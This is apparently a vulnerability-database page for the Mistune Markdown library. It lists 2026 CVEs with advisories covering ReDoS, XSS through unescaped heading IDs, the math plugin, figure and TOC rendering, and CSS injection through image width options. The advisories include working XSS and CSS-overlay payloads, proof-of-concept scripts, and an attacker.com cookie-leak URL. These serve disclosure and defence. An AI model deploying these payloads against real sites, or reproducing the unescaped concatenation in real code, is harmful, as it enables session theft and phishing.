Mistune
by Authlib
Source repositories
CVEs (7)
| CVE | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-33079 | Hig | 0.57 | — | 0.00 | May 6, 2026 | In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive. | |
| CVE-2026-44897 | med | 0.26 | — | — | May 9, 2026 | ## Summary `HTMLRenderer.heading()` builds the opening `<hN>` tag by string-concatenating the `id` attribute value directly into the HTML — with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element. The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like `#installation` or `#getting-started` — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute. ## Details **File:** `src/mistune/renderers/html.py` ```python def heading(self, text: str, level: int, **attrs: Any) -> str: tag = "h" + str(level) html = "<" + tag _id = attrs.get("id") if _id: html += ' id="' + _id + '"' # ← _id is never escaped return html + ">" + text + "</" + tag + ">\n" ``` The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `"` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned — no escaping occurs at any point in the pipeline. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, … bl_src = "## Introduction\n" bl_out, _ = md_safe.parse(bl_src) ``` Output — ID is auto-generated, no user text appears in it: ```html <h2 id="toc_1">Introduction</h2> ``` **Step 2 — Add the realistic trigger: a text-based `heading_id` callback** Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation: ```python def raw_id(token, index): return token.get("text", "") # returns raw heading text as the ID md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text contains a double-quote followed by an injected attribute: ``` ## foo" onmouseover="alert(document.cookie)" x=" ``` When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value. **Step 4 — Observe attribute breakout in the output** ```python ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' ex_out, _ = md_vuln.parse(ex_src) ``` Actual output: ```html <h2 id="foo" onmouseover="alert(document.cookie)" x="">foo" onmouseover="alert(document.cookie)" x="</h2> ``` Note: the heading **body text** is correctly escaped (`"`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted. ### Script A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser. ```python #!/usr/bin/env python3 """H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h2.md" bl_src = "## Introduction\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out, _ = md_safe.parse(bl_src) print(f"[{bl_file}]\n{bl_src}") print("[output — id=toc_1, no user content, safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h2.md" ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out, _ = md_vuln.parse(ex_src) print(f"[{ex_file}]\n{ex_src}") print("[output — heading_id returns raw text, id= not escaped]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body> <h1>H2 — Heading ID XSS (unescaped id= attribute)</h1> <p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p> {case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h2.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example Usage: ```bash python poc.py ``` Once the script is run, open `report_h2.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction | | **Integrity** | DOM manipulation, phishing content injection, forced navigation | | **Availability** | Page freeze or crash available to attacker | **Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value. | |
| CVE-2026-44896 | med | 0.26 | — | — | May 8, 2026 | In `src/mistune/directives/image.py`, the `render_figure()` function concatenates `figclass` and `figwidth` options directly into HTML attributes without escaping (lines 152-168). This allows attribute injection and XSS even when `HTMLRenderer(escape=True)` is used, because these values bypass the inline renderer. Other attributes in the same file (src, alt, style) are properly escaped; figclass/figwidth were missed. | |
| CVE-2026-44708 | med | 0.26 | — | — | May 8, 2026 | ## Summary The mistune math plugin renders inline math (`$...$`) and block math (`$$...$$`) by concatenating the raw user-supplied content directly into the HTML output **without any HTML escaping**. This occurs even when the parser is explicitly created with `escape=True`, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM. The result is a silent contract violation: a developer who enables `escape=True` reasonably expects complete XSS protection, but the math plugin operates as an independent render path that ignores the renderer's `_escape` flag entirely. ## Details **File:** `src/mistune/plugins/math.py` ```python def render_inline_math(renderer, text): # `text` is raw user input — no escape() call anywhere return r'<span class="math">\(' + text + r"\)</span>" def render_block_math(renderer, text): # same issue for block-level $$...$$ return '<div class="math">$$\n' + text + "\n$$</div>\n" ``` Both functions take `text` directly from the parsed token and concatenate it into the output string. Neither function: - calls `escape(text)` from `mistune.util` - checks `renderer._escape` - calls `safe_entity(text)` or any other sanitisation helper The `escape=True` flag only influences the main `HTMLRenderer` methods (`paragraph`, `heading`, `codespan`, etc.). Plugin render functions registered via `md.renderer.register()` receive the `renderer` instance but have no mechanism that enforces the escape contract - they must opt in manually, and `math.py` does not. ## PoC **Step 1 — Establish the baseline (escape=True works for plain HTML)** The script creates a markdown parser with `escape=True` and the math plugin enabled, then feeds it a raw `<script>` tag that is *not* inside math delimiters: ```python md = create_markdown(escape=True, plugins=["math"]) bl_src = "<script>alert(document.cookie)</script>\n" bl_out = str(md(bl_src)) ``` Expected and actual output — the script tag is correctly escaped: ```html <p><script>alert(document.cookie)</script></p> ``` This confirms `escape=True` is working for the normal render path. **Step 2 — Craft the exploit payload** Wrap the identical `<script>` payload inside inline math delimiters `$...$`. The content is token-extracted as `text` and handed to `render_inline_math()`: ```python ex_src = "$<script>alert(document.cookie)</script>$\n" ex_out = str(md(ex_src)) ``` **Step 3 — Observe the bypass** Actual output — the script tag is emitted raw, unescaped: ```html <p><span class="math">\(<script>alert(document.cookie)</script>\)</span></p> ``` The `<script>` block is live inside the `<span class="math">` wrapper. Any browser that renders this HTML will execute `alert(document.cookie)`. **Step 4 — Block math variant (`$$...$$`)** The same bypass applies to block-level math. Payload: ``` $$ <img src=x onerror="alert(document.cookie)"> $$ ``` Output: ```html <div class="math">$$ <img src=x onerror="alert(document.cookie)"> $$</div> ``` The `onerror` handler fires as soon as the browser tries to load the non-existent image `x`. ### Script A verification script was written to test this issue. It creates a HTML page showing the bypass rendering in the browser. ```python #!/usr/bin/env python3 """H1: Math plugin bypasses escape=True — HTML inside $...$ passes through raw.""" import os, html as h from mistune import create_markdown md = create_markdown(escape=True, plugins=["math"]) # --- baseline --- bl_file = "baseline_h1.md" bl_src = "<script>alert(document.cookie)</script>\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — escape=True works normally here]") print(bl_out) # --- exploit --- ex_file = "exploit_h1.md" ex_src = "$<script>alert(document.cookie)</script>$\n" with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — escape=True bypassed inside math delimiters]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H1 — Math XSS</title><style>{CSS}</style></head><body> <h1>H1 — Math Plugin XSS (escape=True bypass)</h1> <p class="desc">render_inline_math() in plugins/math.py concatenates user content without escape(). The escape=True renderer flag is completely ignored inside $...$ delimiters.</p> {case("baseline", "Same HTML outside $...$ — escape=True works", bl_file, bl_src, bl_out)} {case("exploit", "Same HTML inside $...$ — escape=True bypassed", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h1.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once the script is run, open `report_h1.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Attacker can exfiltrate session cookies, auth tokens, and any data visible to the victim's browser session | | **Integrity** | Attacker can mutate page content, inject phishing forms, redirect the user, or perform authenticated actions | | **Availability** | Attacker can crash or freeze the page (denial-of-service to the user) | **Risk amplifier:** This is a *bypass* of an explicit security control. Developers who have audited their application and confirmed `escape=True` is set believe they have XSS protection. This vulnerability silently invalidates that assumption for every math-enabled parser instance, making it likely to be missed in code reviews and security audits. | |
| CVE-2026-44899 | 0.00 | — | — | May 14, 2026 | ## Summary The Image directive plugin validates the `:width:` and `:height:` options with a regex compiled as `_num_re = re.compile(r"^\d+(?:\.\d*)?")`. This pattern is applied via `re.match()` (which anchors only at the **start** of the string, not the end). Any value that begins with one or more digits passes validation, regardless of what follows. When the validated value is not a plain integer, `render_block_image()` inserts it directly into a `style="width:...;"` or `style="height:...;"` attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the `style=` attribute verbatim and without escaping. An attacker can therefore inject an arbitrary chain of CSS properties — including `position:fixed`, `background-color`, `z-index`, `outline`, and `opacity` — using nothing more than a single `:width:` option in a fenced image directive. The resulting element can visually cover the entire browser viewport, enabling full-page phishing overlays and UI redressing attacks. ## Details **File:** `src/mistune/directives/image.py` ```python _num_re = re.compile(r"^\d+(?:\.\d*)?") # no $ anchor — prefix match only def _parse_attrs(options): height = options.get("height") width = options.get("width") if height and _num_re.match(height): # passes if value STARTS with a digit attrs["height"] = height # full value stored, not just digits if width and _num_re.match(width): # same — prefix-only check attrs["width"] = width ``` And in `render_block_image()`: ```python if width: if width.isdigit(): img += ' width="' + width + '"' # safe: integer → HTML attribute else: style += "width:" + width + ";" # UNSAFE: non-integer → raw style value ``` The `isdigit()` branch correctly uses an HTML attribute for plain integers. The `else` branch assumes that anything that passed `_num_re.match()` is a safe CSS length like `100px` or `50%`. However, because the regex is prefix-only, `100vw;height:100vh;position:fixed;...` also passes, and the entire string lands in `style=` unmodified. ## PoC **Step 1 — Establish the baseline (safe plain-integer dimensions)** The script creates a parser with `escape=True`, `FencedDirective`, and the `Image` plugin. A safe image directive is rendered with integer `width` and `height`: ```python md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) bl_out = str(md(bl_src)) ``` Expected and actual output — clean `width=` and `height=` HTML attributes, no `style=`: ```html <div class="block-image"><img src="photo.jpg" alt="safe image" width="400" height="300" /></div> ``` **Step 2 — Understand why non-integer widths go into `style=`** When `width` is not a plain integer (e.g., `100px`), `width.isdigit()` returns `False`, so the render path falls through to `style += "width:" + width + ";"`. This is the intended mechanism for CSS-unit dimensions. The flaw is that `_num_re.match()` lets far more than CSS units through. **Step 3 — Craft the exploit payload** Provide a `:width:` value that begins with a valid number (satisfying `_num_re.match()`) but appends an entire CSS attack chain after it: ``` :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 ``` - `100vw` — starts with `1`, passes `_num_re.match()`; also sets the width to full viewport width - `;height:100vh` — overrides height to full viewport height - `;position:fixed` — lifts element out of document flow, fixed to the browser viewport - `;top:0;left:0` — anchors overlay to the top-left corner - `;z-index:9999` — places it above all other page content - `;background-color:#e11d48` — fills the overlay with vivid crimson - `;outline:8px solid #facc15` — adds a bright yellow border - `;color:#fff;opacity:.93` — styles the alt-text label in white with near-full opacity Full exploit markdown: ``` ```{image} x.jpg :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 :alt: ⚠ CSS INJECTED — click to dismiss ⚠ ``` ``` **Step 4 — Observe the injected `style=` in the output** ```python ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) ex_out = str(md(ex_src)) ``` Actual output: ```html <div class="block-image"><img src="x.jpg" alt="⚠ CSS INJECTED — click to dismiss ⚠" style="width:100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93;" /></div> ``` Every injected CSS property is present in the `style=` attribute. When a browser renders this HTML, the `<img>` element: - expands to fill 100% of the viewport width and height - sits fixed at the top-left corner, scrolling with the viewport - is coloured crimson with a yellow outline - appears above all other page content The result is a complete full-page phishing overlay generated from a single Markdown image directive. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H6: Image directive CSS injection — width/height use prefix-only re.match(). Exploit combines: position:fixed + background-color + outline colour → a full-viewport coloured overlay injected via a single :width: option. """ import os, html as h from mistune import create_markdown from mistune.directives import FencedDirective from mistune.directives.image import Image md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) # --- baseline --- bl_file = "baseline_h6.md" bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — clean width/height attributes, no style injection]") print(bl_out) # --- exploit --- # _num_re.match() is prefix-only (no $ anchor), so anything after the leading # digits is accepted and written verbatim into style="width:<value>;". # This single :width: value smuggles a full CSS attack chain: # position:fixed → overlay sits above the entire page # top/left/width/height → covers 100 % of the viewport # background-color:#e11d48 → vivid crimson fill # outline:8px solid #facc15 → bright yellow border # color:#fff → white alt-text label # z-index:9999 → on top of everything ex_file = "exploit_h6.md" ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — colour + background-colour + fixed overlay injected into style=]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .warn{background:#fffbeb;border:1px solid #fbbf24;border-radius:6px;padding:10px 16px; font-size:.85em;color:#92400e;margin:12px 0} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc; box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px; font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px; background:#fff;font-size:.9em;position:relative;overflow:hidden;height:180px} /* scope the live-render sandbox so position:fixed stays inside the box */ .sandbox{position:relative;width:100%;height:100%} .sandbox img{max-width:100%;max-height:100%;object-fit:contain} /* override position:fixed on exploit img to keep it inside the preview box */ .sandbox img[style*="position:fixed"]{position:absolute!important;width:100%!important; height:100%!important;top:0!important;left:0!important} """ def case(kind, label, filename, src, out): header = "BASELINE" if kind == "baseline" else "EXPLOIT" sandbox = f'<div class="sandbox">{out}</div>' return f""" <div class="case {kind}"> <div class="case-header">{header} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ live render (sandboxed to preview box)</div> <div class="rendered">{sandbox}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H6 — Image CSS Injection</title><style>{CSS}</style></head><body> <h1>H6 — Image Directive CSS Injection</h1> <p class="desc"> <code>_parse_attrs()</code> in <code>directives/image.py</code> validates <code>:width:</code> / <code>:height:</code> with <code>_num_re.match()</code> (prefix-only — no <code>$</code> anchor). Anything after the leading digits is accepted verbatim and written straight into a <code>style=</code> attribute. A single <code>:width:</code> option is sufficient to smuggle an arbitrary CSS chain: <strong>position:fixed · background-color · outline colour · full-viewport overlay</strong>. </p> <div class="warn"> ⚠ The EXPLOIT preview below is sandboxed inside its box. In a real document the crimson overlay would cover the <em>entire browser window</em>. </div> {case("baseline", "Integer dims → clean width/height= attributes, no style=", bl_file, bl_src, bl_out)} {case("exploit", ":width: carries position:fixed + background-color + outline → full-viewport coloured overlay", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h6.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h6.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | CSS-based data exfiltration via `background-image: url(https://attacker.com/?leak=...)` is possible in some browser/CSP configurations | | **Integrity** | Full-viewport overlay enables complete UI replacement: phishing login forms, fake alerts, click-jacking, brand impersonation | | **Availability** | The overlay obscures all page content from the user until dismissed or navigated away | **Real-world impact scenario:** An attacker posts a Markdown document to a platform (wiki, issue tracker, documentation site) that renders mistune with the Image directive. Any user who views the page sees a full-screen crimson overlay matching the attacker's design, replacing or concealing the legitimate page content. The overlay can contain a convincing login prompt, survey form, or urgent warning designed to capture credentials. | ||
| CVE-2026-44898 | 0.00 | — | — | May 14, 2026 | ## Summary `render_toc_ul()` builds a `<ul>` table-of-contents tree from a list of `(level, id, text)` tuples. Both the `id` value (used as `href="#<id>"`) and the `text` value (used as the visible link label) are inserted into `<a>` tags via a plain Python format string — with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the `href="#..."` attribute context, injecting arbitrary HTML tags including `<script>` blocks directly into the rendered TOC. This vulnerability is closely related to H2 (unescaped `id=` in `heading()`): the same `heading_id` callback pattern that triggers H2 also populates the `toc_items` list that `render_toc_ul()` consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup. ## Details **File:** `src/mistune/toc.py` ```python def render_toc_ul(toc): ... for level, k, text in toc: # k = heading id (used verbatim as href fragment) # text = heading text (used verbatim as link label) item = '<a href="#{}">{}</a>'.format(k, text) # Neither k nor text is passed through escape() at any point ``` The `k` and `text` values come directly from the `toc_items` list accumulated during parsing. If `k` contains `"` or `>`, the `href` attribute is broken. If `text` contains `<`, raw tags are injected as the visible link content. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom callback). The default hook assigns sequential numeric IDs that never contain user text: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_src = "# Introduction\n\n## Installation\n" _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) ``` Output — clean, safe TOC: ```html <ul> <li><a href="#toc_1">Introduction</a> <ul> <li><a href="#toc_2">Installation</a></li> </ul> </li> </ul> ``` **Step 2 — Enable the vulnerable `heading_id` callback** Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators: ```python def raw_id(token, index): return token.get("text", "") md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text terminates the `href="#..."` attribute and injects a `<script>` block followed by a dangling `<a href="` to absorb the closing `">` that `render_toc_ul` appends: ``` ## x"><script>alert(document.cookie)</script><a href=" ``` When `raw_id` processes this heading, it returns the entire text as the ID: `x"><script>alert(document.cookie)</script><a href="`. **Step 4 — Observe script injection in the TOC output** ```python ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) ``` `render_toc_ul()` formats the malicious ID directly into the `<a href>`: ```python '<a href="#{}">{}</a>'.format(k, text) # becomes: '<a href="#x"><script>alert(document.cookie)</script><a href="">...<a/>' ``` Actual output: ```html <ul> <li><a href="#x"><script>alert(document.cookie)</script><a href="">x"><script>alert(document.cookie)</script><a href="</a></li> </ul> ``` The `<script>` block is live in the document. Note that the anchor *label* (`text`) is escaped correctly by mistune's inline renderer before it reaches `toc_items`, but `k` (the heading ID) is not escaped anywhere. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H4: render_toc_ul() puts raw heading ID into <a href> without escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook, render_toc_ul def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h4.md" bl_src = "# Introduction\n\n## Installation\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{bl_file}]\n{bl_src}") print("[toc output — safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h4.md" ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{ex_file}]\n{ex_src}") print("[toc output — script injected via href breakout]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>TOC output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H4 — TOC XSS</title><style>{CSS}</style></head><body> <h1>H4 — TOC render_toc_ul() XSS</h1> <p class="desc">render_toc_ul() in toc.py uses '<a href="#{{}}">{{}}</a>'.format(k, text) — neither k (the heading ID) nor text is escaped before insertion.</p> {case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h4.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h4.html` in the browser and observe the behaviour. ## 